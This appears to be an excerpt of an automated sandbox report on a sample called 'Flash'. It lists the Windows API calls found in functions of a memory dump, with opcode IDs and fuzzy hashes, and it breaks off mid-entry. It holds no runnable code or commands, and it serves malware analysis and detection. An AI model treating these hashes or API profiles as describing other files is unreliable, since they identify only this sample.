                                                        • Instruction Fuzzy Hash: 2731B03160025AAFDB218F65EE44BBB7BB9FF41324F154129E8648B1D1DB32E8A1DB50
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00A5553F
                                                          • Part of subcall function 00A33B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A33B4E
                                                          • Part of subcall function 00A33B34: GetCurrentThreadId.KERNEL32 ref: 00A33B55
                                                          • Part of subcall function 00A33B34: AttachThreadInput.USER32(00000000,?,00A355C0), ref: 00A33B5C
                                                        • GetCaretPos.USER32(?), ref: 00A55550
                                                        • ClientToScreen.USER32(00000000,?), ref: 00A5558B
                                                        • GetForegroundWindow.USER32 ref: 00A55591
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 6b554e1d7805e1caa48b6dd1a5462758c4f89de8a950f75b843ac7d96c8c7aca
                                                        • Instruction ID: 990089e9ea0fd6eef51500a567ec6636f5ace6d5d4e882ca0028d6e3aa034cf9
                                                        • Opcode Fuzzy Hash: 6b554e1d7805e1caa48b6dd1a5462758c4f89de8a950f75b843ac7d96c8c7aca
                                                        • Instruction Fuzzy Hash: B6310E71D00108AFDB10EFB5D985EEFB7F9EF98304F10806AE515E7241EA75AE458BA0
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • GetCursorPos.USER32(?), ref: 00A5CB7A
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A0BCEC,?,?,?,?,?), ref: 00A5CB8F
                                                        • GetCursorPos.USER32(?), ref: 00A5CBDC
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A0BCEC,?,?,?), ref: 00A5CC16
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: e4d05f28c21eeb49c241ef44a3a9ea1b56ae84b941826d6ee91e10a33de5d8fa
                                                        • Instruction ID: d1d5236a911ee8f9eeb1589d7148a71af4628e8ce02f4fb4b67a9702cf54e110
                                                        • Opcode Fuzzy Hash: e4d05f28c21eeb49c241ef44a3a9ea1b56ae84b941826d6ee91e10a33de5d8fa
                                                        • Instruction Fuzzy Hash: 1D31C134600118AFCB15CF94C859EBE7BB5FB49321F048099FD059B261C7315D51EFA0
                                                        APIs
                                                        • __setmode.LIBCMT ref: 009F0BE2
                                                          • Part of subcall function 009E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A37E51,?,?,00000000), ref: 009E4041
                                                          • Part of subcall function 009E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A37E51,?,?,00000000,?,?), ref: 009E4065
                                                        • _fprintf.LIBCMT ref: 009F0C19
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00A2694C
                                                          • Part of subcall function 009F4CCA: _flsall.LIBCMT ref: 009F4CE3
                                                        • __setmode.LIBCMT ref: 009F0C4E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 3a2d28e0832a3d8ecf165cc95a95e640339ea71458f23f85a06609e7e7d7e183
                                                        • Instruction ID: 92362219744cbe097b86c8a9205e50ab637c49110456ed947c4eed2cac004bec
                                                        • Opcode Fuzzy Hash: 3a2d28e0832a3d8ecf165cc95a95e640339ea71458f23f85a06609e7e7d7e183
                                                        • Instruction Fuzzy Hash: 29110231A042086ACB08B7B9AC46BBE7B6D9FC0321F14051AF304972C2DE655D9247A1
                                                        APIs
                                                          • Part of subcall function 00A28D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A28D3F
                                                          • Part of subcall function 00A28D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D49
                                                          • Part of subcall function 00A28D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D58
                                                          • Part of subcall function 00A28D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D5F
                                                          • Part of subcall function 00A28D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A28D75
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A292C1
                                                        • _memcmp.LIBCMT ref: 00A292E4
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A2931A
                                                        • HeapFree.KERNEL32(00000000), ref: 00A29321
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 649168c5ed70e31b777794168d7c7ba137729982b629d512b93685454a92586f
                                                        • Instruction ID: 8a9a76154a2e6d03b218a937425253b2f67768c417adc8d99f3437e4ede64ccd
                                                        • Opcode Fuzzy Hash: 649168c5ed70e31b777794168d7c7ba137729982b629d512b93685454a92586f
                                                        • Instruction Fuzzy Hash: 35219A32E40219EFDF10DFA8D945BEFB7B8EF44701F044069E894AB290D770AA45CBA0
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00A563BD
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A563D7
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A563E5
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A563F3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: f1a72764a5089f460fc55f426e8e5f1c6e77c64400f49d6486414e0f2ce76423
                                                        • Instruction ID: e1d91013bac578fe95bfc36155616d46bf99e5bb065eb4aea67fb8c78150e9ce
                                                        • Opcode Fuzzy Hash: f1a72764a5089f460fc55f426e8e5f1c6e77c64400f49d6486414e0f2ce76423
                                                        • Instruction Fuzzy Hash: CE11DC31340414AFD700AB28DC44FBA77A9EF85320F14821AF916CB2E2CBB0AD01CB90
                                                        APIs
                                                          • Part of subcall function 00A2F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A2E46F,?,?,?,00A2F262,00000000,000000EF,00000119,?,?), ref: 00A2F867
                                                          • Part of subcall function 00A2F858: lstrcpyW.KERNEL32(00000000,?), ref: 00A2F88D
                                                          • Part of subcall function 00A2F858: lstrcmpiW.KERNEL32(00000000,?,00A2E46F,?,?,?,00A2F262,00000000,000000EF,00000119,?,?), ref: 00A2F8BE
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00A2E488
                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00A2E4AE
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00A2E4E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 6f2dc55f4200b6b70e70879bbea3ddcf8e0461d7716ac19a75343bf6b0080f70
                                                        • Instruction ID: 56767bb7f16694dde4e78772df350e8cb27fcd6c12cd049e4ba1bcdfe7535f70
                                                        • Opcode Fuzzy Hash: 6f2dc55f4200b6b70e70879bbea3ddcf8e0461d7716ac19a75343bf6b0080f70
                                                        • Instruction Fuzzy Hash: 14118136100355AFDB25EF68E845D7A77B9FF45350B40403AF906CB2A0EB719991C791
                                                        APIs
                                                        • _free.LIBCMT ref: 00A05331
                                                          • Part of subcall function 009F593C: __FF_MSGBANNER.LIBCMT ref: 009F5953
                                                          • Part of subcall function 009F593C: __NMSG_WRITE.LIBCMT ref: 009F595A
                                                          • Part of subcall function 009F593C: RtlAllocateHeap.NTDLL(00F50000,00000000,00000001,?,00000004,?,?,009F1003,?), ref: 009F597F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 8ac77a581adb36b75e76a21ec2050f4713647a4d7e412c5e65f20e1987678537
                                                        • Instruction ID: f4d8377447245e66c1f1e3f5c6f8571843728c964ace0cbdc1481c6044f24c1a
                                                        • Opcode Fuzzy Hash: 8ac77a581adb36b75e76a21ec2050f4713647a4d7e412c5e65f20e1987678537
                                                        • Instruction Fuzzy Hash: 6811A732D05A1DAFCB252FB0BC1577B37E89F543A1B104926FA589E1D0DEB489418F91
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A34385
                                                        • _memset.LIBCMT ref: 00A343A6
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A343F8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A34401
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        • Opcode ID: a0956d4579b6225c9d95be98576131fa1dfa905ee3747cdea6e72a2599db7033
                                                        • Instruction ID: d61e09a7fc0e8b7fcd72e1ae956c54340f5414648b2a9e8672385a97b9ea4a0f
                                                        • Opcode Fuzzy Hash: a0956d4579b6225c9d95be98576131fa1dfa905ee3747cdea6e72a2599db7033
                                                        • Instruction Fuzzy Hash: 5C110A719012287AD7309BA5AC4DFEBBB7CEF45720F00469AF908E7280D6744E808BA4
                                                        APIs
                                                          • Part of subcall function 009E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A37E51,?,?,00000000), ref: 009E4041
                                                          • Part of subcall function 009E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A37E51,?,?,00000000,?,?), ref: 009E4065
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00A46A84
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A46A8F
                                                        • _memmove.LIBCMT ref: 00A46ABC
                                                        • inet_ntoa.WSOCK32(?), ref: 00A46AC7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: e49c961faf69214926ad4c66fb3dd2a81de3c101495a2681b5fc536b51f484aa
                                                        • Instruction ID: 4461d5fede1e9b670ab0511bdeac58368cc1f7e2d5fd8245d326d1727d2afab1
                                                        • Opcode Fuzzy Hash: e49c961faf69214926ad4c66fb3dd2a81de3c101495a2681b5fc536b51f484aa
                                                        • Instruction Fuzzy Hash: 6D119076500009AFCB00EFE4CD46DAEB7B9EF98301B148065F502A72A2DF30AE40CBA1
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A29719
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A2972B
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A29741
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A2975C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ee94eb93af4a8acc9c4f5091a3c4bf041124dcddcc266a3b966101a9872faf2b
                                                        • Instruction ID: 8d9e7bbb5b1095847dce9f6db0df2ea1c151c967d4bc8c3e9037340244e7a6bf
                                                        • Opcode Fuzzy Hash: ee94eb93af4a8acc9c4f5091a3c4bf041124dcddcc266a3b966101a9872faf2b
                                                        • Instruction Fuzzy Hash: EA115E39900218FFDB10DF99CD84EDEBBB8FB48710F2040A5E900B7250D6716E11DB90
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 009D16B4
                                                        • GetClientRect.USER32(?,?), ref: 00A0B93C
                                                        • GetCursorPos.USER32(?), ref: 00A0B946
                                                        • ScreenToClient.USER32(?,?), ref: 00A0B951
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 17261e51c18218d8f3e500519f13f8d5ebdfcf82a0e1c3bb9cd9fc5db9a17016
                                                        • Instruction ID: 87f2b7cf37b3fee39f7c5da8ef78d2b9ef73f5ce7c151df41f9b0e0923838565
                                                        • Opcode Fuzzy Hash: 17261e51c18218d8f3e500519f13f8d5ebdfcf82a0e1c3bb9cd9fc5db9a17016
                                                        • Instruction Fuzzy Hash: D7112876A40019BBCB00EF94D985DBE77B9FB45301F548456F941E7250C770BA92CBB1
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009D214F
                                                        • GetStockObject.GDI32(00000011), ref: 009D2163
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 009D216D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: ce93890c4a7357a7854cd20968dc7df8c61860d8e9f6fd5ff5f269f674ff11bb
                                                        • Instruction ID: 5331e4f80e9a85ffd2e0d7276fbaf50251df71b0a6466ee1a803aa0c5a6cecf8
                                                        • Opcode Fuzzy Hash: ce93890c4a7357a7854cd20968dc7df8c61860d8e9f6fd5ff5f269f674ff11bb
                                                        • Instruction Fuzzy Hash: 8511AD72145509BFDF028F90DC44EEBBB6DEF68354F048212FA0452220C771DCA1DBA0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A304EC,?,00A3153F,?,00008000), ref: 00A3195E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A304EC,?,00A3153F,?,00008000), ref: 00A31983
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A304EC,?,00A3153F,?,00008000), ref: 00A3198D
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00A304EC,?,00A3153F,?,00008000), ref: 00A319C0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 4a8febcd977497443e67f7f78d7134ab1d205b2e9df3774b6edbbec7f7cf4275
                                                        • Instruction ID: db7cfa9d1ab704c14b4cff5f9c7466c10a02d2fea13062d33df3344fc3deec81
                                                        • Opcode Fuzzy Hash: 4a8febcd977497443e67f7f78d7134ab1d205b2e9df3774b6edbbec7f7cf4275
                                                        • Instruction Fuzzy Hash: EC112731D0462DDBCF00DFE5D998BEEBBB8FF09751F014555E980B2240CB3096A18B91
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A5E1EA
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00A5E201
                                                        • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00A5E216
                                                        • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00A5E234
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 52fc540e0ae32a8be075b5c64c41f30033fe6227fd4c1d3038228d3cde27b846
                                                        • Instruction ID: 5e5cc9ce3ad3a99a821f62a2972bf050c36e60639c2182aadfda696f73a5b457
                                                        • Opcode Fuzzy Hash: 52fc540e0ae32a8be075b5c64c41f30033fe6227fd4c1d3038228d3cde27b846
                                                        • Instruction Fuzzy Hash: E6113CB52053049BEB34CF91DD0CF97BBBCFB00B05F108959EA16D6054DBB0E6489BA2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: 683b82feabf3c75ee66e827c5020d1196f0e6625c6d4acfcb74be329915330d2
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: E1019A3284814EBBCF126F84ED01CEE3F22BB2D340B088515FA1858171C736E9B1AB81
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00A5B956
                                                        • ScreenToClient.USER32(?,?), ref: 00A5B96E
                                                        • ScreenToClient.USER32(?,?), ref: 00A5B992
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A5B9AD
                                                        Memory Dump Source
